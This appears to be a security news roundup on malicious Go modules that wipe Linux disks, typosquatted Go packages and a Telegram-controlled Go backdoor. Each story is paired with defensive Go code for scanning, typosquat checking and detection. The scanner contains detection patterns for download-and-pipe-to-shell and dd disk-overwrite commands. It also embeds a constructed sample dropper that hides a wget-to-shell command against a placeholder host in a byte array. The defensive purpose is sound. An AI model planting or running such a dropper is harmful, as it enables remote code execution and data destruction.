CyberSecurity news

FlagThis - #golang

info@thehackernews.com (The Hacker News)@The Hacker News //
Cybersecurity researchers have uncovered a supply chain attack on the Go ecosystem: three malicious Go modules, github.com/truthfulpharm/prototransform, github.com/blankloggia/go-mcp and github.com/steelpoor/tlsproxy, carry obfuscated code that fetches a next-stage payload which overwrites a Linux system's primary disk and leaves it unbootable. The attack, discovered in April 2025, illustrates the risk of importing dependencies straight from public repositories and how code obfuscation lets such modules pass casual review.

The modules only act on Linux. Once executed, they retrieve a shell script, "done.sh", from a remote server with wget and run it. The script uses the Unix utility dd to overwrite the entire primary disk (/dev/sda) with zeros, which destroys the partition table, file systems, operating system and user data in one pass and leaves the machine unbootable. According to Socket researcher Kush Pandya, this leaves nothing for data recovery tools or forensic processes to restore, which is what makes this class of supply chain attack so dangerous.

This incident underscores the escalating risk in open-source supply chains, where apparently trusted code can turn into a destructive payload. The impact of such an attack is complete data loss, prolonged operational downtime, and severe financial and reputational damage for affected organizations. Security experts recommend thorough dependency audits, automated code scanning, and continuous monitoring for obfuscated or suspicious behaviour in third-party packages as the key mitigations. Note that go.sum and the checksum database only guarantee that a given module version is the same bytes every time; they say nothing about whether those bytes are safe, so the review has to happen before the dependency is adopted.
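As an added example (not code from this page or from Socket's report), here is a small Go program that applies the observations above to a module's source before it is adopted: it parses a file with go/ast, decodes integer-array literals back into text so that a wget or dd payload hidden that way becomes visible, and flags os/exec calls and runtime.GOOS platform gates. The file it scans is a constructed stand-in embedded in the program, not the real module code; the patterns, the example.invalid URL and the "sample.go" name are assumptions for illustration.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"regexp"
	"strconv"
)

type Finding struct {
	Line   int
	Reason string
}

// Payload shapes a dropper of this kind would carry, as plain text or hidden in an int array.
var payloadPatterns = []*regexp.Regexp{
	regexp.MustCompile(`\b(wget|curl)\b.*\|\s*(ba)?sh\b`),
	regexp.MustCompile(`\bdd\b.*\bof=/dev/`),
}

// decodeIntArray turns a literal like []byte{119, 103, ...} back into text, or "" if it is not all small ints.
func decodeIntArray(cl *ast.CompositeLit) string {
	buf := make([]byte, 0, len(cl.Elts))
	for _, e := range cl.Elts {
		lit, _ := e.(*ast.BasicLit)
		if lit == nil || lit.Kind != token.INT {
			return ""
		}
		v, err := strconv.ParseInt(lit.Value, 0, 64)
		if err != nil || v < 0 || v > 255 {
			return ""
		}
		buf = append(buf, byte(v))
	}
	return string(buf)
}

// ScanSource parses one Go file and reports, in source order, suspicious literals, runtime.GOOS gates and exec.Command* calls.
func ScanSource(filename, src string) ([]Finding, error) {
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	var findings []Finding
	add := func(n ast.Node, reason string) {
		findings = append(findings, Finding{fset.Position(n.Pos()).Line, reason})
	}
	match := func(n ast.Node, text, how string) {
		for _, re := range payloadPatterns {
			if re.MatchString(text) {
				add(n, how+" matches "+re.String())
			}
		}
	}
	ast.Inspect(f, func(n ast.Node) bool {
		switch x := n.(type) {
		case *ast.SelectorExpr:
			pkg, ok := x.X.(*ast.Ident)
			if ok && pkg.Name == "exec" && (x.Sel.Name == "Command" || x.Sel.Name == "CommandContext") {
				add(x, "os/exec call: exec."+x.Sel.Name)
			} else if ok && pkg.Name == "runtime" && x.Sel.Name == "GOOS" {
				add(x, "platform gate on runtime.GOOS")
			}
		case *ast.BasicLit:
			if s, err := strconv.Unquote(x.Value); err == nil && x.Kind == token.STRING {
				match(x, s, "string literal")
			}
		case *ast.CompositeLit:
			if s := decodeIntArray(x); s != "" {
				match(x, s, "int array decoding to "+strconv.Quote(s))
			}
		}
		return true
	})
	return findings, nil
}

// sample is a constructed stand-in for the described dropper, not the real module
// code; the bytes spell "wget -O - http://example.invalid/done.sh | sh".
const sample = `package evil
import ("os/exec"; "runtime")
var p = []byte{119, 103, 101, 116, 32, 45, 79, 32, 45, 32, 104, 116, 116, 112, 58, 47, 47, 101, 120, 97,
	109, 112, 108, 101, 46, 105, 110, 118, 97, 108, 105, 100, 47, 100, 111, 110, 101, 46, 115, 104, 32, 124, 32, 115, 104}
func Run() {
	if runtime.GOOS == "linux" {
		exec.Command("/bin/sh", "-c", string(p)).Run()
	}
}
`
func main() {
	findings, _ := ScanSource("sample.go", sample)
	for _, f := range findings {
		fmt.Printf("sample.go:%d: %s\n", f.Line, f.Reason)
	}
}
```

Run it over each file under `go env GOMODCACHE` for a new dependency. A hit is a reason to read the code, not proof of malice: legitimate tools shell out and embed byte tables too, so the value is in the combination (decoded download-and-pipe-to-shell string, platform gate, exec call) rather than any single finding.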



References :
  • Cyber Security News: Go‑Powered Supply‑Chain Hack Deploys Disk‑Wipers, Erasing Critical Data at Scale
  • gbhackers.com: Hackers Weaponize Go Modules to Deliver Disk‑Wiping Malware, Causing Massive Data Loss
  • The Hacker News: Malicious Go Modules Deliver Disk-Wiping Linux Malware in Advanced Supply Chain Attack
  • socket.dev: A single line of obfuscated Go code wiped entire disks clean.
  • Talkback Resources: Malicious Go Modules Deliver Disk-Wiping Linux Malware in Advanced Supply Chain Attack [app] [mal]
  • socket.dev: wget to Wipeout: Malicious Go Modules Fetch Destructive Payload
  • securityaffairs.com: Malicious Go Modules designed to wipe Linux systems
  • cyberpress.org: Go‑Powered Supply‑Chain Hack Deploys Disk‑Wipers, Erasing Critical Data at Scale
  • Talkback Resources: Malicious Go Modules designed to wipe Linux systems [sys] [mal]
  • www.scworld.com: Linux disk-wiping malware spread via Go modules
  • BleepingComputer: Linux wiper malware hidden in malicious Go modules on GitHub
Classification:
  • HashTags: #supplychainattack #golang #malware
  • Target: Linux Systems
  • Attacker: Not identified in the reporting
  • Product: Go modules
  • Feature: Supply Chain
  • Malware: Linux disk wiper (done.sh)
  • Type: Malware
  • Severity: Disaster
Kirsten Doyle@Information Security Buzz //
Socket researchers have discovered a malicious campaign that infiltrates the Go ecosystem with typosquatted packages. The packages install a hidden loader targeting Linux and macOS systems. The threat actor has published at least seven packages that impersonate widely used Go libraries.

The packages share the same malicious filenames and the same obfuscation techniques, which points to a single coordinated threat actor. One of them appears aimed at financial-sector developers. Once imported, the packages can execute remote code, which could be used to steal data or credentials.
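One practical check against the typosquatting described above, written for this page as an added example rather than anything from Socket's report: compare every module path in a go.mod against a list of widely used modules and flag near-misses by edit distance. The allowlist and the go.mod below are constructed for the example; the misspelled paths in it are invented and are not the packages from the campaign.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// knownModules is a constructed stand-in for an allowlist of widely used module paths.
var knownModules = []string{
	"github.com/gorilla/mux",
	"github.com/spf13/cobra",
	"github.com/stretchr/testify",
}

type Suspect struct {
	Required, LooksLike string
	Distance            int
}

// levenshtein returns the edit distance (insert, delete, substitute) between a and b.
func levenshtein(a, b string) int {
	ra, rb := []rune(a), []rune(b)
	prev, cur := make([]int, len(rb)+1), make([]int, len(rb)+1)
	for j := range prev {
		prev[j] = j
	}
	for i := 1; i <= len(ra); i++ {
		cur[0] = i
		for j := 1; j <= len(rb); j++ {
			d := prev[j-1] // substitution, free when the runes match
			if ra[i-1] != rb[j-1] {
				d++
			}
			if prev[j]+1 < d {
				d = prev[j] + 1 // deletion
			}
			if cur[j-1]+1 < d {
				d = cur[j-1] + 1 // insertion
			}
			cur[j] = d
		}
		prev, cur = cur, prev
	}
	return prev[len(rb)]
}

// closest reports the nearest known module when path is not itself known and
// lies within maxDist edits of one.
func closest(path string, maxDist int) (Suspect, bool) {
	best := Suspect{Required: path, Distance: maxDist + 1}
	for _, k := range knownModules {
		if k == path {
			return Suspect{}, false
		}
		if d := levenshtein(path, k); d < best.Distance {
			best.LooksLike, best.Distance = k, d
		}
	}
	return best, best.Distance <= maxDist
}

// CheckGoMod walks the require block of a go.mod and flags near-misses.
func CheckGoMod(gomod string, maxDist int) []Suspect {
	var out []Suspect
	inBlock := false
	sc := bufio.NewScanner(strings.NewReader(gomod))
	for sc.Scan() {
		f := strings.Fields(sc.Text())
		switch {
		case len(f) == 2 && f[0] == "require" && f[1] == "(":
			inBlock = true
		case len(f) == 1 && f[0] == ")":
			inBlock = false
		case inBlock && len(f) >= 2 && !strings.HasPrefix(f[0], "//"):
			if s, ok := closest(f[0], maxDist); ok {
				out = append(out, s)
			}
		}
	}
	return out
}

// sampleGoMod is constructed for this example: two requires are one-character
// misspellings of modules in knownModules.
const sampleGoMod = `module example.com/app
require (
	github.com/gorila/mux v1.8.1
	github.com/spf13/cobra v1.8.0
	github.com/strechr/testify v1.9.0 // indirect
)
`

func main() {
	for _, s := range CheckGoMod(sampleGoMod, 2) {
		fmt.Printf("%s looks like %s (distance %d)\n", s.Required, s.LooksLike, s.Distance)
	}
}
```

A distance of 1 or 2 against a popular path is worth a manual look at the module's origin and history; legitimate forks sit at the same distance, so the output is a review queue, not a block list.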



References :
  • Information Security Buzz: Typosquatted Go Packages Distribute Malware Loader Targeting Linux and macOS
  • Anonymous: Researchers have found a malicious campaign targeting Go developers with fake libraries. At least 7 typosquatted packages impersonate popular Go modules to deploy loader malware. These can execute remote code, stealing data or credentials on Linux and macOS systems.
  • socket.dev: Typosquatted Go Packages Deliver Malware Loader Targeting Linux and macOS Systems
  • The Hacker News: Seven Malicious Go Packages Found Deploying Malware on Linux and macOS Systems
info@thehackernews.com (The Hacker News)@The Hacker News //
A new Golang-based backdoor has been discovered that leverages the Telegram Bot API for command-and-control (C2) communications. Cybersecurity researchers at Netskope Threat Labs detailed the malware, suggesting it may be of Russian origin. According to security researcher Leandro Fróes, the malware, while seemingly still under development, is fully functional and acts as a backdoor once executed. The backdoor utilizes an open-source library offering Golang bindings for the Telegram Bot API.

Once launched, the malware checks whether it is running from a specific path and file name (C:\Windows\Temp\svchost.exe); if not, it copies itself there and starts a new process from that copy. The legitimate svchost.exe lives in C:\Windows\System32, so a binary with that name under Temp is itself a detection opportunity. The backdoor then polls the Telegram Bot API for commands from an attacker-controlled chat, supporting commands to execute PowerShell, relaunch itself, and self-destruct. A screenshot command is also present, though not fully implemented.

Netskope notes that cloud applications like Telegram are a challenge for defenders, because attackers get a ready-made, easy-to-set-up channel that blends in with legitimate traffic at every stage of an attack. The "/cmd" instruction replies with "Enter the command:" in Russian, which further supports the assessment of possible Russian origin. Taken together, Telegram-based C2, PowerShell execution and a self-destruct command give the backdoor a small footprint and a way to remove itself once detected.
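Two of the details above (the fixed path C:\Windows\Temp\svchost.exe and the Bot API C2 channel) translate directly into detection logic. The Go program below is an added example, not Netskope's code: it runs two rules over constructed process-creation and network telemetry lines in a made-up key=value format, flagging svchost.exe started outside its system directories and connections to api.telegram.org from processes that are not known Telegram clients. The client allowlist, field names and sample events are assumptions.

```go
package main

import (
	"fmt"
	"strings"
)

// Event is one parsed telemetry line in the constructed format used here:
// timestamp, kind (PROC or NET), then whitespace-separated key=value fields.
type Event struct {
	Time, Kind string
	Fields     map[string]string
}

type Alert struct {
	Rule, PID, Image string
}

// Legitimate homes for svchost.exe; anything else with that name is masquerading.
var svchostDirs = []string{`C:\Windows\System32`, `C:\Windows\SysWOW64`}

// Processes expected to talk to api.telegram.org. Tune for the environment:
// legitimate Bot API automation (ops scripts, chatops) would need adding here.
var telegramClients = []string{"telegram.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

func parseEvent(line string) (Event, bool) {
	f := strings.Fields(line)
	if len(f) < 3 {
		return Event{}, false
	}
	ev := Event{Time: f[0], Kind: f[1], Fields: map[string]string{}}
	for _, kv := range f[2:] {
		k, v, _ := strings.Cut(kv, "=")
		ev.Fields[k] = v
	}
	return ev, true
}

// splitWinPath splits a Windows path on backslashes regardless of the host OS.
func splitWinPath(p string) (dir, base string) {
	i := strings.LastIndex(p, `\`)
	if i < 0 {
		return "", p
	}
	return p[:i], p[i+1:]
}

func containsFold(list []string, s string) bool {
	for _, x := range list {
		if strings.EqualFold(x, s) {
			return true
		}
	}
	return false
}

// Detect applies the two rules: svchost.exe outside its system directories, and
// a connection to api.telegram.org from a process that is not a known client.
func Detect(lines []string) []Alert {
	var alerts []Alert
	for _, l := range lines {
		ev, ok := parseEvent(l)
		if !ok {
			continue
		}
		image := ev.Fields["image"]
		dir, base := splitWinPath(image)
		switch ev.Kind {
		case "PROC":
			if strings.EqualFold(base, "svchost.exe") && !containsFold(svchostDirs, dir) {
				alerts = append(alerts, Alert{"svchost-masquerade", ev.Fields["pid"], image})
			}
		case "NET":
			host, _, _ := strings.Cut(ev.Fields["dst"], ":")
			if strings.EqualFold(host, "api.telegram.org") && !containsFold(telegramClients, base) {
				alerts = append(alerts, Alert{"telegram-bot-api-c2", ev.Fields["pid"], image})
			}
		}
	}
	return alerts
}

// sampleTelemetry is constructed for this example; it is not a real capture.
var sampleTelemetry = []string{
	`2025-02-14T10:01:02Z PROC pid=4321 image=C:\Windows\Temp\svchost.exe parent=C:\Users\bob\Downloads\update.exe`,
	`2025-02-14T10:01:03Z NET pid=4321 image=C:\Windows\Temp\svchost.exe dst=api.telegram.org:443`,
	`2025-02-14T10:01:05Z PROC pid=884 image=C:\Windows\System32\svchost.exe parent=C:\Windows\System32\services.exe`,
	`2025-02-14T10:02:00Z NET pid=5120 image=C:\Users\bob\AppData\Roaming\Telegram\Telegram.exe dst=api.telegram.org:443`,
	`2025-02-14T10:03:00Z NET pid=7777 image=C:\Python312\python.exe dst=api.telegram.org:443`,
}

func main() {
	for _, a := range Detect(sampleTelemetry) {
		fmt.Printf("%s pid=%s image=%s\n", a.Rule, a.PID, a.Image)
	}
}
```

The second rule also fires on legitimate Bot API automation, as the python.exe line shows; that is the tuning cost of using a popular cloud service as a C2 indicator, and it is why the masquerading rule is the higher-confidence of the two. Correlating both on the same pid, as happens for 4321 here, is what turns them into a confident detection.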



References :
  • ciso2ciso.com: New Golang-Based Backdoor Uses Telegram Bot API for Evasive C2 Operations – Source:thehackernews.com
  • securityaffairs.com: New Golang-based backdoor relies on Telegram for C2 communication
  • Talkback Resources: New Golang-Based Backdoor Uses Telegram Bot API for Evasive C2 Operations [mal]
  • The Hacker News: New Golang-Based Backdoor Uses Telegram Bot API for Evasive C2 Operations
  • hackread.com: Hackers Exploit Telegram API to Spread New Golang Backdoor with Russian Connection
  • Talkback Resources: New Golang-Based Backdoor Uses Telegram Bot API for Evasive C2 Operations
  • securityonline.info: A new Golang-based backdoor, potentially of Russian origin, uses Telegram for C2 communication, exploiting cloud apps for enhanced stealth.
  • Talkback Resources: Talkback.sh article summarizing a new Golang-based backdoor using Telegram Bot API for evasive C2 operations.
  • www.scworld.com: Telegram API exploited by new Golang backdoor
  • Security Risk Advisors: New #Golang backdoor abuses #Telegram Bot API for stealthy remote commands and self-destruct.
  • securityonline.info: Security researchers at Netskope Threat Labs have uncovered a new backdoor malware written in Golang that leverages Telegram.
  • Threat Labs - Netskope: Golang Malware Uses Telegram Bot API for Stealthy Remote Commands and Data Exfiltration
  • www.csoonline.com: Russian malware discovered with Telegram hacks for C2 operations
Classification:
  • HashTags: #Malware #Telegram #CyberSecurity
  • Company: Telegram
  • Target: Windows systems
  • Attacker: Not identified (assessed as possibly of Russian origin)
  • Product: Telegram Bot API
  • Feature: command-and-control
  • Malware: Golang Backdoor
  • Type: Malware
  • Severity: Major